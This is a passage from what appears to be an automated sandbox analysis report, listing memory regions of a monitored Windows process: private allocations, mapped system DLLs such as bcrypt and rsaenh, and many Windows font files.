filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll")
Region:
id = 375
start_va = 0x10d0000
end_va = 0x120ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000010d0000"
filename = ""
Region:
id = 376
start_va = 0x1270000
end_va = 0x12affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001270000"
filename = ""
Region:
id = 377
start_va = 0x74950000
end_va = 0x74966fff
monitored = 0
entry_point = 0x749535fa
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll")
Region:
id = 378
start_va = 0x738e0000
end_va = 0x738f6fff
monitored = 0
entry_point = 0x738e3573
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll")
Region:
id = 379
start_va = 0x8b0000
end_va = 0x8ebfff
monitored = 0
entry_point = 0x8b128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 380
start_va = 0x8b0000
end_va = 0x8ebfff
monitored = 0
entry_point = 0x8b128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 381
start_va = 0x8b0000
end_va = 0x8ebfff
monitored = 0
entry_point = 0x8b128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 382
start_va = 0x8b0000
end_va = 0x8ebfff
monitored = 0
entry_point = 0x8b128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 383
start_va = 0x8b0000
end_va = 0x8ebfff
monitored = 0
entry_point = 0x8b128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 384
start_va = 0x738a0000
end_va = 0x738dafff
monitored = 0
entry_point = 0x738a128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 385
start_va = 0xc60000
end_va = 0xce1fff
monitored = 0
entry_point = 0xc619a9
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll")
Region:
id = 386
start_va = 0xc60000
end_va = 0xce1fff
monitored = 0
entry_point = 0xc619a9
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll")
Region:
id = 387
start_va = 0x6d7a0000
end_va = 0x6d823fff
monitored = 0
entry_point = 0x6d7a19a9
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll")
Region:
id = 388
start_va = 0x4df0000
end_va = 0x4feffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004df0000"
filename = ""
Region:
id = 389
start_va = 0x600000
end_va = 0x60ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000600000"
filename = ""
Region:
id = 390
start_va = 0x610000
end_va = 0x61ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000610000"
filename = ""
Region:
id = 391
start_va = 0x8b0000
end_va = 0x8bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008b0000"
filename = ""
Region:
id = 392
start_va = 0x6d610000
end_va = 0x6d79ffff
monitored = 0
entry_point = 0x6d6ad026
region_type = mapped_file
name = "gdiplus.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\gdiplus.dll")
Region:
id = 393
start_va = 0x4df0000
end_va = 0x4fcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004df0000"
filename = ""
Region:
id = 394
start_va = 0x4fe0000
end_va = 0x4feffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004fe0000"
filename = ""
Region:
id = 395
start_va = 0xca0000
end_va = 0xcdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000ca0000"
filename = ""
Region:
id = 396
start_va = 0x4e30000
end_va = 0x4f2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e30000"
filename = ""
Region:
id = 397
start_va = 0x4fc0000
end_va = 0x4fcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004fc0000"
filename = ""
Region:
id = 398
start_va = 0x74940000
end_va = 0x74944fff
monitored = 0
entry_point = 0x749411d0
region_type = mapped_file
name = "shfolder.dll"
filename = "\\Windows\\SysWOW64\\shfolder.dll" (normalized: "c:\\windows\\syswow64\\shfolder.dll")
Region:
id = 399
start_va = 0x7efaa000
end_va = 0x7efacfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efaa000"
filename = ""
Region:
id = 400
start_va = 0x600000
end_va = 0x602fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "gdipfontcachev1.dat"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\GDIPFONTCACHEV1.DAT" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\gdipfontcachev1.dat")
Region:
id = 401
start_va = 0x610000
end_va = 0x616fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "marlett.ttf"
filename = "\\Windows\\Fonts\\marlett.ttf" (normalized: "c:\\windows\\fonts\\marlett.ttf")
Region:
id = 402
start_va = 0x610000
end_va = 0x616fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "marlett.ttf"
filename = "\\Windows\\Fonts\\marlett.ttf" (normalized: "c:\\windows\\fonts\\marlett.ttf")
Region:
id = 403
start_va = 0xee0000
end_va = 0xf9cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "arial.ttf"
filename = "\\Windows\\Fonts\\arial.ttf" (normalized: "c:\\windows\\fonts\\arial.ttf")
Region:
id = 404
start_va = 0xee0000
end_va = 0xf9cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "arial.ttf"
filename = "\\Windows\\Fonts\\arial.ttf" (normalized: "c:\\windows\\fonts\\arial.ttf")
Region:
id = 405
start_va = 0x10d0000
end_va = 0x11cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000010d0000"
filename = ""
Region:
id = 406
start_va = 0x11d0000
end_va = 0x120ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000011d0000"
filename = ""
Region:
id = 407
start_va = 0xee0000
end_va = 0xf67fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ariali.ttf"
filename = "\\Windows\\Fonts\\ariali.ttf" (normalized: "c:\\windows\\fonts\\ariali.ttf")
Region:
id = 408
start_va = 0xee0000
end_va = 0xf67fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ariali.ttf"
filename = "\\Windows\\Fonts\\ariali.ttf" (normalized: "c:\\windows\\fonts\\ariali.ttf")
Region:
id = 409
start_va = 0xee0000
end_va = 0xf96fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "arialbd.ttf"
filename = "\\Windows\\Fonts\\arialbd.ttf" (normalized: "c:\\windows\\fonts\\arialbd.ttf")
Region:
id = 410
start_va = 0xee0000
end_va = 0xf96fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "arialbd.ttf"
filename = "\\Windows\\Fonts\\arialbd.ttf" (normalized: "c:\\windows\\fonts\\arialbd.ttf")
Region:
id = 411
start_va = 0xee0000
end_va = 0xf69fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "arialbi.ttf"
filename = "\\Windows\\Fonts\\arialbi.ttf" (normalized: "c:\\windows\\fonts\\arialbi.ttf")
Region:
id = 412
start_va = 0xee0000
end_va = 0xf69fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "arialbi.ttf"
filename = "\\Windows\\Fonts\\arialbi.ttf" (normalized: "c:\\windows\\fonts\\arialbi.ttf")
Region:
id = 413
start_va = 0x4ff0000
end_va = 0x5f72fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "batang.ttc"
filename = "\\Windows\\Fonts\\batang.ttc" (normalized: "c:\\windows\\fonts\\batang.ttc")
Region:
id = 414
start_va = 0x4ff0000
end_va = 0x5f72fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "batang.ttc"
filename = "\\Windows\\Fonts\\batang.ttc" (normalized: "c:\\windows\\fonts\\batang.ttc")
Region:
id = 415
start_va = 0x4ff0000
end_va = 0x5f72fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "batang.ttc"
filename = "\\Windows\\Fonts\\batang.ttc" (normalized: "c:\\windows\\fonts\\batang.ttc")
Region:
id = 416
start_va = 0x5f80000
end_va = 0x617ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005f80000"
filename = ""
Region:
id = 417
start_va = 0x4ff0000
end_va = 0x5f72fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "batang.ttc"
filename = "\\Windows\\Fonts\\batang.ttc" (normalized: "c:\\windows\\fonts\\batang.ttc")
Region:
id = 418
start_va = 0x4ff0000
end_va = 0x5f72fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "batang.ttc"
filename = "\\Windows\\Fonts\\batang.ttc" (normalized: "c:\\windows\\fonts\\batang.ttc")
Region:
id = 419
start_va = 0xee0000
end_va = 0xf8dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "cour.ttf"
filename = "\\Windows\\Fonts\\cour.ttf" (normalized: "c:\\windows\\fonts\\cour.ttf")
Region:
id = 420
start_va = 0xee0000
end_va = 0xf8dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "cour.ttf"
filename = "\\Windows\\Fonts\\cour.ttf" (normalized: "c:\\windows\\fonts\\cour.ttf")
Region:
id = 421
start_va = 0xee0000
end_va = 0xf76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "couri.ttf"
filename = "\\Windows\\Fonts\\couri.ttf" (normalized: "c:\\windows\\fonts\\couri.ttf")
Region:
id = 422
start_va = 0xee0000
end_va = 0xf76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "couri.ttf"
filename = "\\Windows\\Fonts\\couri.ttf" (normalized: "c:\\windows\\fonts\\couri.ttf")
Region:
id = 423
start_va = 0xee0000
end_va = 0xf8dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "courbd.ttf"
filename = "\\Windows\\Fonts\\courbd.ttf" (normalized: "c:\\windows\\fonts\\courbd.ttf")
Region:
id = 424
start_va = 0xee0000
end_va = 0xf8dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "courbd.ttf"
filename = "\\Windows\\Fonts\\courbd.ttf" (normalized: "c:\\windows\\fonts\\courbd.ttf")
Region:
id = 425
start_va = 0xee0000
end_va = 0xf61fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "courbi.ttf"
filename = "\\Windows\\Fonts\\courbi.ttf" (normalized: "c:\\windows\\fonts\\courbi.ttf")
Region:
id = 426
start_va = 0xee0000
end_va = 0xf61fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "courbi.ttf"
filename = "\\Windows\\Fonts\\courbi.ttf" (normalized: "c:\\windows\\fonts\\courbi.ttf")
Region:
id = 427
start_va = 0x8b0000
end_va = 0x8defff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "daunpenh.ttf"
filename = "\\Windows\\Fonts\\daunpenh.ttf" (normalized: "c:\\windows\\fonts\\daunpenh.ttf")
Region:
id = 428
start_va = 0x8b0000
end_va = 0x8defff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "daunpenh.ttf"
filename = "\\Windows\\Fonts\\daunpenh.ttf" (normalized: "c:\\windows\\fonts\\daunpenh.ttf")
Region:
id = 429
start_va = 0x8b0000
end_va = 0x8d4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "dokchamp.ttf"
filename = "\\Windows\\Fonts\\dokchamp.ttf" (normalized: "c:\\windows\\fonts\\dokchamp.ttf")
Region:
id = 430
start_va = 0x8b0000
end_va = 0x8d4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "dokchamp.ttf"
filename = "\\Windows\\Fonts\\dokchamp.ttf" (normalized: "c:\\windows\\fonts\\dokchamp.ttf")
Region:
id = 431
start_va = 0x8b0000
end_va = 0x8cafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "estre.ttf"
filename = "\\Windows\\Fonts\\estre.ttf" (normalized: "c:\\windows\\fonts\\estre.ttf")
Region:
id = 432
start_va = 0x8b0000
end_va = 0x8cafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "estre.ttf"
filename = "\\Windows\\Fonts\\estre.ttf" (normalized: "c:\\windows\\fonts\\estre.ttf")
Region:
id = 433
start_va = 0x8b0000
end_va = 0x8dafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "euphemia.ttf"
filename = "\\Windows\\Fonts\\euphemia.ttf" (normalized: "c:\\windows\\fonts\\euphemia.ttf")
Region:
id = 434
start_va = 0x8b0000
end_va = 0x8dafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "euphemia.ttf"
filename = "\\Windows\\Fonts\\euphemia.ttf" (normalized: "c:\\windows\\fonts\\euphemia.ttf")
Region:
id = 435
start_va = 0x8b0000
end_va = 0x8eefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gautami.ttf"
filename = "\\Windows\\Fonts\\gautami.ttf" (normalized: "c:\\windows\\fonts\\gautami.ttf")
Region:
id = 436
start_va = 0x8b0000
end_va = 0x8eefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gautami.ttf"
filename = "\\Windows\\Fonts\\gautami.ttf" (normalized: "c:\\windows\\fonts\\gautami.ttf")
Region:
id = 437
start_va = 0x8b0000
end_va = 0x8e6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gautamib.ttf"
filename = "\\Windows\\Fonts\\gautamib.ttf" (normalized: "c:\\windows\\fonts\\gautamib.ttf")
Region:
id = 438
start_va = 0x8b0000
end_va = 0x8e6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gautamib.ttf"
filename = "\\Windows\\Fonts\\gautamib.ttf" (normalized: "c:\\windows\\fonts\\gautamib.ttf")
Region:
id = 439
start_va = 0x970000
end_va = 0x9cefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "vani.ttf"
filename = "\\Windows\\Fonts\\Vani.ttf" (normalized: "c:\\windows\\fonts\\vani.ttf")
Region:
id = 440
start_va = 0x970000
end_va = 0x9cefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "vani.ttf"
filename = "\\Windows\\Fonts\\Vani.ttf" (normalized: "c:\\windows\\fonts\\vani.ttf")
Region:
id = 441
start_va = 0x970000
end_va = 0x9cafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "vanib.ttf"
filename = "\\Windows\\Fonts\\Vanib.ttf" (normalized: "c:\\windows\\fonts\\vanib.ttf")
Region:
id = 442
start_va = 0x970000
end_va = 0x9cafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "vanib.ttf"
filename = "\\Windows\\Fonts\\Vanib.ttf" (normalized: "c:\\windows\\fonts\\vanib.ttf")
Region:
id = 443
start_va = 0x4ff0000
end_va = 0x5cd5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gulim.ttc"
filename = "\\Windows\\Fonts\\gulim.ttc" (normalized: "c:\\windows\\fonts\\gulim.ttc")
Region:
id = 444
start_va = 0x4ff0000
end_va = 0x5cd5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gulim.ttc"
filename = "\\Windows\\Fonts\\gulim.ttc" (normalized: "c:\\windows\\fonts\\gulim.ttc")
Region:
id = 445
start_va = 0x4ff0000
end_va = 0x5cd5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gulim.ttc"
filename = "\\Windows\\Fonts\\gulim.ttc" (normalized: "c:\\windows\\fonts\\gulim.ttc")
Region:
id = 446
start_va = 0x4ff0000
end_va = 0x5cd5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gulim.ttc"
filename = "\\Windows\\Fonts\\gulim.ttc" (normalized: "c:\\windows\\fonts\\gulim.ttc")
Region:
id = 447
start_va = 0x6180000
end_va = 0x657ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006180000"
filename = ""
Region:
id = 448
start_va = 0x4ff0000
end_va = 0x5cd5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gulim.ttc"
filename = "\\Windows\\Fonts\\gulim.ttc" (normalized: "c:\\windows\\fonts\\gulim.ttc")
Region:
id = 449
start_va = 0x8b0000
end_va = 0x8d1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "impact.ttf"
filename = "\\Windows\\Fonts\\impact.ttf" (normalized: "c:\\windows\\fonts\\impact.ttf")
Region:
id = 450
start_va = 0x8b0000
end_va = 0x8d1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "impact.ttf"
filename = "\\Windows\\Fonts\\impact.ttf" (normalized: "c:\\windows\\fonts\\impact.ttf")
Region:
id = 451
start_va = 0xee0000
end_va = 0xf65fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "iskpota.ttf"
filename = "\\Windows\\Fonts\\iskpota.ttf" (normalized: "c:\\windows\\fonts\\iskpota.ttf")
Region:
id = 452
start_va = 0xee0000
end_va = 0xf65fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "iskpota.ttf"
filename = "\\Windows\\Fonts\\iskpota.ttf" (normalized: "c:\\windows\\fonts\\iskpota.ttf")
Region:
id = 453
start_va = 0x970000
end_va = 0x9cafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "iskpotab.ttf"
filename = "\\Windows\\Fonts\\iskpotab.ttf" (normalized: "c:\\windows\\fonts\\iskpotab.ttf")
Region:
id = 454
start_va = 0x970000
end_va = 0x9cafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "iskpotab.ttf"
filename = "\\Windows\\Fonts\\iskpotab.ttf" (normalized: "c:\\windows\\fonts\\iskpotab.ttf")
Region:
id = 455
start_va = 0x8b0000
end_va = 0x8e3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kalinga.ttf"
filename = "\\Windows\\Fonts\\kalinga.ttf" (normalized: "c:\\windows\\fonts\\kalinga.ttf")
Region:
id = 456
start_va = 0x8b0000
end_va = 0x8e3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kalinga.ttf"
filename = "\\Windows\\Fonts\\kalinga.ttf" (normalized: "c:\\windows\\fonts\\kalinga.ttf")
Region:
id = 457
start_va = 0x8b0000
end_va = 0x8e2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kalingab.ttf"
filename = "\\Windows\\Fonts\\kalingab.ttf" (normalized: "c:\\windows\\fonts\\kalingab.ttf")
Region:
id = 458
start_va = 0x8b0000
end_va = 0x8e2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kalingab.ttf"
filename = "\\Windows\\Fonts\\kalingab.ttf" (normalized: "c:\\windows\\fonts\\kalingab.ttf")
Region:
id = 459
start_va = 0x8b0000
end_va = 0x8d0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kartika.ttf"
filename = "\\Windows\\Fonts\\kartika.ttf" (normalized: "c:\\windows\\fonts\\kartika.ttf")
Region:
id = 460
start_va = 0x8b0000
end_va = 0x8d0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kartika.ttf"
filename = "\\Windows\\Fonts\\kartika.ttf" (normalized: "c:\\windows\\fonts\\kartika.ttf")
Region:
id = 461
start_va = 0x8b0000
end_va = 0x8cefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kartikab.ttf"
filename = "\\Windows\\Fonts\\kartikab.ttf" (normalized: "c:\\windows\\fonts\\kartikab.ttf")
Region:
id = 462
start_va = 0x8b0000
end_va = 0x8cefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kartikab.ttf"
filename = "\\Windows\\Fonts\\kartikab.ttf" (normalized: "c:\\windows\\fonts\\kartikab.ttf")
Region:
id = 463
start_va = 0x970000
end_va = 0x9c0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "khmerui.ttf"
filename = "\\Windows\\Fonts\\KhmerUI.ttf" (normalized: "c:\\windows\\fonts\\khmerui.ttf")
Region:
id = 464
start_va = 0x970000
end_va = 0x9c0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "khmerui.ttf"
filename = "\\Windows\\Fonts\\KhmerUI.ttf" (normalized: "c:\\windows\\fonts\\khmerui.ttf")
Region:
id = 465
start_va = 0x970000
end_va = 0x9b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "khmeruib.ttf"
filename = "\\Windows\\Fonts\\KhmerUIb.ttf" (normalized: "c:\\windows\\fonts\\khmeruib.ttf")
Region:
id = 466
start_va = 0x970000
end_va = 0x9b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "khmeruib.ttf"
filename = "\\Windows\\Fonts\\KhmerUIb.ttf" (normalized: "c:\\windows\\fonts\\khmeruib.ttf")
Region:
id = 467
start_va = 0x8b0000
end_va = 0x8c7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "laoui.ttf"
filename = "\\Windows\\Fonts\\LaoUI.ttf" (normalized: "c:\\windows\\fonts\\laoui.ttf")
Region:
id = 468
start_va = 0x8b0000
end_va = 0x8c7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "laoui.ttf"
filename = "\\Windows\\Fonts\\LaoUI.ttf" (normalized: "c:\\windows\\fonts\\laoui.ttf")
Region:
id = 469
start_va = 0x8b0000
end_va = 0x8c5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "laouib.ttf"
filename = "\\Windows\\Fonts\\LaoUIb.ttf" (normalized: "c:\\windows\\fonts\\laouib.ttf")
Region:
id = 470
start_va = 0x8b0000
end_va = 0x8c5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "laouib.ttf"
filename = "\\Windows\\Fonts\\LaoUIb.ttf" (normalized: "c:\\windows\\fonts\\laouib.ttf")
Region:
id = 471
start_va = 0x8b0000
end_va = 0x8cdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "latha.ttf"
filename = "\\Windows\\Fonts\\latha.ttf" (normalized: "c:\\windows\\fonts\\latha.ttf")
Region:
id = 472
start_va = 0x8b0000
end_va = 0x8cdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "latha.ttf"
filename = "\\Windows\\Fonts\\latha.ttf" (normalized: "c:\\windows\\fonts\\latha.ttf")
Region:
id = 473
start_va = 0x8b0000
end_va = 0x8cdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lathab.ttf"
filename = "\\Windows\\Fonts\\lathab.ttf" (normalized: "c:\\windows\\fonts\\lathab.ttf")
Region:
id = 474
start_va = 0x8b0000
end_va = 0x8cdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lathab.ttf"
filename = "\\Windows\\Fonts\\lathab.ttf" (normalized: "c:\\windows\\fonts\\lathab.ttf")
Region:
id = 475
start_va = 0x8b0000
end_va = 0x8ccfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lucon.ttf"
filename = "\\Windows\\Fonts\\lucon.ttf" (normalized: "c:\\windows\\fonts\\lucon.ttf")
Region:
id = 476
start_va = 0x8b0000
end_va = 0x8ccfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lucon.ttf"
filename = "\\Windows\\Fonts\\lucon.ttf" (normalized: "c:\\windows\\fonts\\lucon.ttf")
Region:
id = 477
start_va = 0x4ff0000
end_va = 0x5412fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "malgun.ttf"
filename = "\\Windows\\Fonts\\malgun.ttf" (normalized: "c:\\windows\\fonts\\malgun.ttf")
Region:
id = 478
start_va = 0x4ff0000
end_va = 0x5412fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "malgun.ttf"
filename = "\\Windows\\Fonts\\malgun.ttf" (normalized: "c:\\windows\\fonts\\malgun.ttf")
Region:
id = 479
start_va = 0x4ff0000
end_va = 0x543efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "malgunbd.ttf"
filename = "\\Windows\\Fonts\\malgunbd.ttf" (normalized: "c:\\windows\\fonts\\malgunbd.ttf")
Region:
id = 480
start_va = 0x4ff0000
end_va = 0x543efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "malgunbd.ttf"
filename = "\\Windows\\Fonts\\malgunbd.ttf" (normalized: "c:\\windows\\fonts\\malgunbd.ttf")
Region:
id = 481
start_va = 0x8b0000
end_va = 0x8e2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "mangal.ttf"
filename = "\\Windows\\Fonts\\mangal.ttf" (normalized: "c:\\windows\\fonts\\mangal.ttf")
Region:
id = 482
start_va = 0x8b0000
end_va = 0x8e2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "mangal.ttf"
filename = "\\Windows\\Fonts\\mangal.ttf" (normalized: "c:\\windows\\fonts\\mangal.ttf")
Region:
id = 483
start_va = 0x8b0000
end_va = 0x8defff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "mangalb.ttf"
filename = "\\Windows\\Fonts\\mangalb.ttf" (normalized: "c:\\windows\\fonts\\mangalb.ttf")
Region:
id = 484
start_va = 0x8b0000
end_va = 0x8defff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "mangalb.ttf"
filename = "\\Windows\\Fonts\\mangalb.ttf" (normalized: "c:\\windows\\fonts\\mangalb.ttf")
Region:
id = 485
start_va = 0x4ff0000
end_va = 0x5907fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "meiryo.ttc"
filename = "\\Windows\\Fonts\\meiryo.ttc" (normalized: "c:\\windows\\fonts\\meiryo.ttc")
Region:
id = 486
start_va = 0x4ff0000
end_va = 0x5907fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "meiryo.ttc"
filename = "\\Windows\\Fonts\\meiryo.ttc" (normalized: "c:\\windows\\fonts\\meiryo.ttc")
Region:
id = 487
start_va = 0x4ff0000
end_va = 0x5907fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "meiryo.ttc"
filename = "\\Windows\\Fonts\\meiryo.ttc" (normalized: "c:\\windows\\fonts\\meiryo.ttc")
Region:
id = 488
start_va = 0x4ff0000
end_va = 0x5907fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "meiryo.ttc"
filename = "\\Windows\\Fonts\\meiryo.ttc" (normalized: "c:\\windows\\fonts\\meiryo.ttc")
Region:
id = 489
start_va = 0x4ff0000
end_va = 0x5907fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "meiryo.ttc"
filename = "\\Windows\\Fonts\\meiryo.ttc" (normalized: "c:\\windows\\fonts\\meiryo.ttc")
Region:
id = 490
start_va = 0x4ff0000
end_va = 0x593cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "meiryob.ttc"
filename = "\\Windows\\Fonts\\meiryob.ttc" (normalized: "c:\\windows\\fonts\\meiryob.ttc")
Region:
id = 491
start_va = 0x4ff0000
end_va = 0x593cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "meiryob.ttc"
filename = "\\Windows\\Fonts\\meiryob.ttc" (normalized: "c:\\windows\\fonts\\meiryob.ttc")
Region:
id = 492
start_va = 0x4ff0000
end_va = 0x593cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "meiryob.ttc"
filename = "\\Windows\\Fonts\\meiryob.ttc" (normalized: "c:\\windows\\fonts\\meiryob.ttc")
Region:
id = 493
start_va = 0x4ff0000
end_va = 0x593cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "meiryob.ttc"
filename = "\\Windows\\Fonts\\meiryob.ttc" (normalized: "c:\\windows\\fonts\\meiryob.ttc")
Region:
id = 494
start_va = 0x4ff0000
end_va = 0x593cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "meiryob.ttc"
filename = "\\Windows\\Fonts\\meiryob.ttc" (normalized: "c:\\windows\\fonts\\meiryob.ttc")
Region:
id = 495
